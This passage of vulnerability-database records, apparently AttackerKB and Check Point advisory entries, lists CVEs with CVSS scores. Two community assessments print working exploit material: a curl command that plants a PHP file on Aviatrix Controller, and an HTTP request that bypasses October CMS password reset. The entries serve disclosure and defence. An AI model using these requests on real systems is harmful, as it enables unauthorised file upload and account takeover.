Command Injection (CVE-2021-21315)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2022-02-02T00:00:00", "id": "CPAI-2021-1058", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:29:23", "description": "An authentication bypass vulnerability exists in Apache Airflow API. Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T00:00:00", "type": "checkpoint_advisories", "title": "Apache Airflow Authentication Bypass (CVE-2020-13927)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2022-02-09T00:00:00", "id": "CPAI-2020-3454", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:37:58", "description": "An information disclosure vulnerability exists in Microsoft Exchange. Successful exploitation could result in the disclosure of sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-09-05T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Information Disclosure (CVE-2021-33766)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-09-05T00:00:00", "id": "CPAI-2021-0547", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-23T23:31:36", "description": "A sever-side request forgery vulnerability exists in VMware vRealize Operations Manager. Successful exploitation of this vulnerability could possibly lead to an attacker accessing administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-23T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Server Side Request Forgery (CVE-2021-21975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-23T00:00:00", "id": "CPAI-2021-1066", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:29:23", "description": "An information disclosure vulnerability exists in Oracle Business Intelligence Enterprise Edition. Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2022-02-02T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Business Intelligence Enterprise Edition Information Disclosure (CVE-2020-14864)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14864"], "modified": "2022-02-02T00:00:00", "id": "CPAI-2020-3453", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "attackerkb": [{"lastseen": "2023-05-27T14:37:29", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25297", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25297"], "modified": "2021-02-19T00:00:00", "id": "AKB:E3841EB6-6FF5-4072-8716-B4BD203AFDB0", "href": "https://attackerkb.com/topics/g6U1KDU84X/cve-2021-25297", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:37:31", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25298", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296", "CVE-2021-25298"], "modified": "2021-02-19T00:00:00", "id": "AKB:58421098-D895-41C4-95F2-2B3E4E3CD2C0", "href": "https://attackerkb.com/topics/c1866NX9mx/cve-2021-25298", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:18:51", "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\n \n**Recent assessments:** \n \n**JoyGhoshs** at October 09, 2021 6:33am UTC reported:\n\n### Description\n\nThis Vulnerability allows an attacker to create and store file on the Aviatrix controller. Exploitation phase doesn\u2019t need any user authentication , or doesn\u2019t require any other users interaction , simply can be exploited using curl . Here is one example.\n \n \n curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo \"Vulnerable Poc\";?>'\n \n # after executing the previous command if the target is vulnerable this will create a php file on this path\n \n https://vulnerable.target.com/v1/poc \n \n\nAttacker can do this unauthenticated because many API calls do not enforce a check for authentication. So this allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem .\n\nOr You can Use This Exploit to do the exploition more easily : <https://github.com/JoyGhoshs/CVE-2021-40870>\n\n\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-40870", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-09-24T00:00:00", "id": "AKB:E355AB47-21A0-4270-B1B7-31327C5DB3E0", "href": "https://attackerkb.com/topics/t5RjZrPTdl/cve-2021-40870", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-02T23:18:39", "description": "octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request. The issue has been patched in Build 472 and v1.1.5.\n\n \n**Recent assessments:** \n \n**kevthehermit** at January 14, 2022 5:01pm UTC reported:\n\n### Ovewrview\n\nThis is a simple Type Confusion / Juggling vulnerability.\n\nOctober CMS will check to see if the User Supplied reset code matches the value in the database `return ($this->reset_password_code == $resetCode);` \nIf we can send a boolean value in place of a reset code we can bypass this check.\n\nLaravel has a feature that if an HTTP POST request is sent as JSON then It will be converted to a matching form data set however the types will persist.\n\nTo exploit this vulnerability we simply need to set the `Content-Type` to JSON and structure our POST request accordingly. An example POST is shown below.\n \n \n POST /backend/backend/auth/reset/1/[] HTTP/1.1\n Host: 172.17.0.2\n Content-Length: 162\n Cache-Control: max-age=0\n Upgrade-Insecure-Requests: 1\n Origin: http://172.17.0.2\n Content-Type: application/json\n User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n Referer: http://172.17.0.2/backend/backend/auth/reset/1/a\n Accept-Encoding: gzip, deflate\n Accept-Language: en-GB,en-US;q=0.9,en;q=0.8\n Cookie: october_session=eyJpdiI6ImlGZHMrRTVEUGh6dHkxWllEeVF5dEE9PSIsInZhbHVlIjoiV2tkcmsrbkJxa2R6OWg1TVFLbTQ2Y1pTSG9ZT1RYTEFwdlY0YVVRVEU5a0pxbG5LdE81WVpXeDdGa3pHclhTWGhkbEE2WGZPME82aEpVWFBqcktEakR6Qng3WVpsWUdzYm9mOG9cL0YxTjNXbXFyUEZxWGNVM1BrcmJLaFVIZXVaIiwibWFjIjoiZmVkMDljNGE2MDc2ZGI5NjgyOThkMDJjZGFhNDcxYzg3MTNlNmJhZTRiYmIzZmVkYjNmYTUyMzA4ZjQxMjdiNiJ9\n Connection: close\n \n {\"_session_key\":\"RQjdfLkFotyuA4BHOjVykboK3DHByTyDFEs7xZXC\",\"_token\":\"jBD7MXYuIrYC4n0GClVCigIBrSOShoUICwy3gShS\",\"postback\":1,\"id\":1,\"code\":true,\"password\":\"hello\"}\n \n\n### In the Wild\n\nThis has not been verified but initial reports suggest this vulnerability was used to deface a set of Ukrainian government websites \u2013 <https://twitter.com/KimZetter/status/1481890639029551106>\n\n### PoC\n\nA proof of concept python script that will attempt to reset the password for the admin account has been published \u2013 <https://github.com/Immersive-Labs-Sec/CVE-2021-32648>\n\n### Detection\n\nAn attacker attempting to exploit this attack will need to trigger a password reset email. If you observe password reset emails then check access to the server and respond accordingly.\n\n### Mitigation\n\nApplying the patches will successfully mitigate against this attack.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-08-26T00:00:00", "type": "attackerkb", "title": "CVE-2021-32648", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2021-09-02T00:00:00", "id": "AKB:EB3F5389-7A37-45E3-AF6F-6C5B475789C9", "href": "https://attackerkb.com/topics/GNepughGqx/cve-2021-32648", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-05-28T20:18:59", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3, undisclosed requests to a virtual server may be incorrectly handled by the Traffic Management Microkernel (TMM) URI normalization, which may trigger a buffer overflow, resulting in a DoS attack. In certain situations, it may theoretically allow bypass of URL based access control or remote code execution (RCE). Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-22991", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2021-04-06T00:00:00", "id": "AKB:510644E5-3B60-4F1C-9390-7CD9A8015090", "href": "https://attackerkb.com/topics/scDa3YuE1j/cve-2021-22991", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T23:20:21", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25296", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296"], "modified": "2021-02-19T00:00:00", "id": "AKB:532E90DB-4495-454E-B0D0-8DD690C03B16", "href": "https://attackerkb.com/topics/faJGD9TxcJ/cve-2021-25296", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T14:43:32", "description": "An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-17T00:00:00", "type": "attackerkb", "title": "CVE-2020-11978", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2020-07-24T00:00:00", "id": "AKB:3B81CEA4-F430-469B-B9D6-4375FF9F7D5E", "href": "https://attackerkb.com/topics/dyrqwSuLUp/cve-2020-11978", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:37:28", "description": "The System Information Library for Node.JS (npm package \u201csysteminformation\u201d) is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() \u2026 do only allow strings, reject any arrays. String sanitation works as expected.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-21315", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-02-23T00:00:00", "id": "AKB:E72B9F04-6006-41F4-A0B3-9639896AA934", "href": "https://attackerkb.com/topics/cbd8mHseCX/cve-2021-21315", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T14:43:16", "description": "The previous default setting for Airflow\u2019s Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at <https://airflow.apache.org/docs/1.10.11/security.html#api-authentication>. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: <https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default>\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2020-13927", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2020-11-26T00:00:00", "id": "AKB:19F38141-ED73-4B57-8775-82311909B267", "href": "https://attackerkb.com/topics/0hz2sav215/cve-2020-13927", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:18:52", "description": "Microsoft Exchange Information Disclosure Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at August 30, 2021 4:59pm UTC reported:\n\nAn unauthenticated actor can perform configuration actions on mailboxes belonging to arbitrary users. Which can be used to copy all emails addressed to a target and account and forward them to an account controlled by the threat actor.\n\n<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": "CVE-2021-33766 ProxyToken", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-31T00:00:00", "id": "AKB:B86FF102-0FBC-45A5-8D59-B98CA36BFCF9", "href": "https://attackerkb.com/topics/EYDEd51S7V/cve-2021-33766-proxytoken", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-05T14:43:17", "description": "Drupal core does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations. This issue affects: Drupal Drupal Core 9.0 versions prior to 9.0.8, 8.9 versions prior to 8.9.9, 8.8 versions prior to 8.8.11, and 7 versions prior to 7.74.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 